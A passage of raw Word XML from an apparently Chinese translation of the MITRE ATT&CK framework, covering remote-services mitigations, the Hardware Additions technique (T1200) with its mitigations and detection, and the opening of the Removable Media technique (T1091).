            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4A2EDA14" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="02710AF5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="0927064E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2961604C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特性</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>程序禁用或移除</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17B801BA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁用或阻止可能不必要的远程可用服务。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2CE6580F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3929879F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络资源</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>访问限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0944BBD4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过集中管理的集中器（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VPN</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和其他托管远程访问系统）来限制远程服务</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>访问</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="44F9274B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BCCF917" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>多因子</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="217C9F54" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C729E7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C729E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对远程服务账号使用双因子</w:t>
            </w:r>
            <w:r w:rsidRPr="00C729E7">
              <w:t>或多因子强认证</w:t>
            </w:r>
            <w:r w:rsidRPr="00C729E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，从而</w:t>
            </w:r>
            <w:r w:rsidRPr="00C729E7">
              <w:t>降低攻击者</w:t>
            </w:r>
            <w:r w:rsidRPr="00C729E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用盗取凭据的能力。但请注意</w:t>
            </w:r>
            <w:r w:rsidRPr="00C729E7">
              <w:t>双因子</w:t>
            </w:r>
            <w:r w:rsidRPr="00C729E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证实施中有时</w:t>
            </w:r>
            <w:r w:rsidRPr="00C729E7">
              <w:t>可能会</w:t>
            </w:r>
            <w:r w:rsidRPr="00C729E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有</w:t>
            </w:r>
            <w:r w:rsidRPr="00C729E7">
              <w:t>双因子</w:t>
            </w:r>
            <w:r w:rsidRPr="00C729E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r w:rsidRPr="00C729E7">
              <w:t>拦截技术。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="642CE3BB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2565308E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络分区</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="360475ED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过网络代理</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网关</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>和防火墙</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>拒绝直接远程访问内部系统。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29296696" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34514051" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D2344" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据最佳</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>实践</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测攻击者使用有效账号来应对远程服务身份认证的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。收集认证日志并分析异常访问模式，活动窗口以及正常工作时间之外的访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DEB840" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1732A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>硬件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00367C7A" w14:paraId="53407A67" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F4F5335" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>: T1200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4137D7B8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FC1AAD" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="165B81EB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t>Windows, Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F93C034" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源</w:t>
            </w:r>
            <w:r w:rsidRPr="00B01B1F">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B01B1F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>资产管理，数据泄漏防护</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72416EB1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00367C7A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:color w:val="555555"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BA4B63B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28EFD618" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>计算机配件、计算机或网络硬件可能被用作载体接入系统从而获得执行权限。虽然少有公开报道提及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>组织利用这些技术，但是有很多渗透测试人员通过硬件添加的方法来实现初始访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5167C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>商业和开源产品都有可能被利用来完成诸如：被动网络分流，中间人加密破解，击键注入攻击，通过直接内存访问（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DMA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）读取内核内存，给既有网络添加无线访问等攻击方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6C5CA1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="9740" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7193"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005C4554" w14:paraId="50C5B808" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="242A4E34" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0606DFD6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00E34483" w14:paraId="4C3A38E5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C31F9F3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对网络访问资源加以限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="344EC076" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设立网络访问控制策略，如使用设备证书、</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t>02.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>标准等。限制注册设备使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DHCP</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从而避免未知设备与受信任系统通信。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00E34483" w14:paraId="0D66F481" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70A594B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制硬件安装</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B46FD0F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用终端安全策略配置和终端监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Agent</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>阻拦未知设备和配件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41BEBA5A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFFDF18" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资产管理系统可以用来帮助发现本不应该接入的计算机或者网络设备。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1E71BD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终端探针可以用来检测通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>USB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、蓝牙以及其他外设接口新增的硬件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFE2738" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3354BA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1732A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过移动存储进行复制</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="30658440" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E46450D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t>: T1091</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48D3E9A0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>横向移动</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04B67A2B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67796B55" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>允许移动存储设备</w:t>
            </w:r>
